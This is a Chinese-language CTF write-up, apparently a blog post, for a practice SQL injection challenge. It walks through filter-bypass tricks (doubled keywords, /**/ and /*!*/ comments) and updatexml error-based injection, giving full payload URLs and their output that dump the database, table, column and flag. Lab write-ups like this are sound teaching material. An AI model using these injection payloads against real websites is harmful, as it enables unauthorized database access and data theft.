美文网首页
实验吧-简单的sql注入

实验吧-简单的sql注入

作者: V0W | 来源:发表于2018-08-06 16:54 被阅读0次

实验吧-简单的sql注入

原题链接

http://ctf5.shiyanbar.com/423/web/

分析

1   正常
1'  无回显
1' or '1'='1    全部数据
测试过滤:
union select 
information_schema 
information_schema.tables
information_schema.columns
table_schema
column_name

发现很多都被过滤了,用不了

这里主要利用两种绕过方法:

  1. 双写绕过
http://ctf5.shiyanbar.com/423/web/?id=1' unionunion selectselect schema_name from information+schema.schemata wherewhere '1'='1
2018-08-06_00004.png

发现空格也被过滤了。。。
schema_
采用+,/**/绕过

http://ctf5.shiyanbar.com/423/web/?id=1'++unionunion++selectselect++table_name++fromfrom++information_schema.tables++wherewhere++'1'='1
表名报错

但是同样的方法查column_name却出现了问题


2018-08-06_00006.png

明明已经注意闭合了,还是报错。

猜测列名为flag
查数据:

http://ctf5.shiyanbar.com/423/web/?id=1'++unionunion++selectselect++flag++fromfrom++flag++wherewhere++'1'='1
flag

2./*!*/绕过,注意/*!*/过滤的是sql关键字,其他变量名不用加。
这里用的是updatexml来报错。然后有一些关键字依然被过滤,采用双写绕过
查数据库

http://ctf5.shiyanbar.com/423/web/?id=-1' or updatexml(1,concat('~',(/*!select*/ /*!database()*/  LIMIT 0,1),'~'),3) or '1'='1

XPATH syntax error: '~web1~'

查表

http://ctf5.shiyanbar.com/423/web/?id=-1' or updatexml(1,concat('~',(/*!select*/ table_name/*!from*/information_schema.tables/*!where*//*!tabltable_schemae_schema*/='web1'  LIMIT 0,1),'~'),3) or '1'='1

XPATH syntax error: '~flag~'

查列名

http://ctf5.shiyanbar.com/423/web/?id=11'or updatexml(1,concat('~',(/*!select*/  ccolumn_nameolumn_name  /*!from*/ infoinformation_schema.columnsrmation_schema.columns /*!where*/ /*!tatable_schemable_schema*/ = 'web1' /*!and*/ table_name='flag' LIMIT 0,1),'~'),3) or '1'='1

XPATH syntax error: '~flag~'

dump

http://ctf5.shiyanbar.com/423/web/?id=11'or updatexml(1,concat('~',(/*!select*/ flag /*!from*/ flag  LIMIT 0,1),'~'),3) or '1'='1

XPATH syntax error: '~flag{Y0u_@r3_5O_dAmn_90Od}~'

flag

flag{Y0u_@r3_5O_dAmn_90Od}

知识点

报错注入,过滤的绕过策略,updatexml

相关文章

  • 实验吧-简单的sql注入

    实验吧-简单的sql注入 原题链接 http://ctf5.shiyanbar.com/423/web/ 分析 发...

  • 实验吧 简单的sql注入

    题目如下 首先简单判断是否存在sql注入输入1,显示ID:1,name:baloteli输入1',显示You ha...

  • 实验吧CTF简单SQL注入

    简单的SQL注入1,2 知识点: 空格用/**/或者()代替 可以把关键字重复一遍防止字符过滤 获取数据库名:1'...

  • 实验吧--简单的SQL注入一

    一、注入点测试 1、查看源码,发现其提交方式为get。 2、链接后面添加id=1'报错,说明其存在注入点 3、输入...

  • 实验吧 简单的SQL注入2

    题目 同第一个注入相比,没什么界面没什么太大变化,只是过滤的东西变了。 注入判断输入1,返回正常;输入1',会报错...

  • 实验吧 简单的SQL注入3

    首先还是晒一下题目: 判断是否存在注入 我们还是来判断一下是否存在注入,输入1'发现会提示语法错误,说明存在注入。...

  • 实验吧 CTF 简单的sql注入

    以下为原文摘抄: 因为本人在阅读答案时,有很多地方不明白的。在多次阅读之后,决定将原文摘抄下,并在不懂的地方加上笔...

  • 实验吧-简单的sql注入之3

    实验吧-简单的sql注入之3 原题链接 http://ctf5.shiyanbar.com/web/index_3...

  • 实验吧-简单的sql注入之2

    简单的sql注入之2 原题链接 http://ctf5.shiyanbar.com/web/index_2.php...

  • 实验吧WP之简单的sql注入

    其实感觉确实不难,不过一些比较看经验的地方没有把握好,导致一直没有出flag 首先,看到这道题,题目很明确,注入。...

网友评论

      本文标题:实验吧-简单的sql注入

      本文链接:https://www.haomeiwen.com/subject/byygvftx.html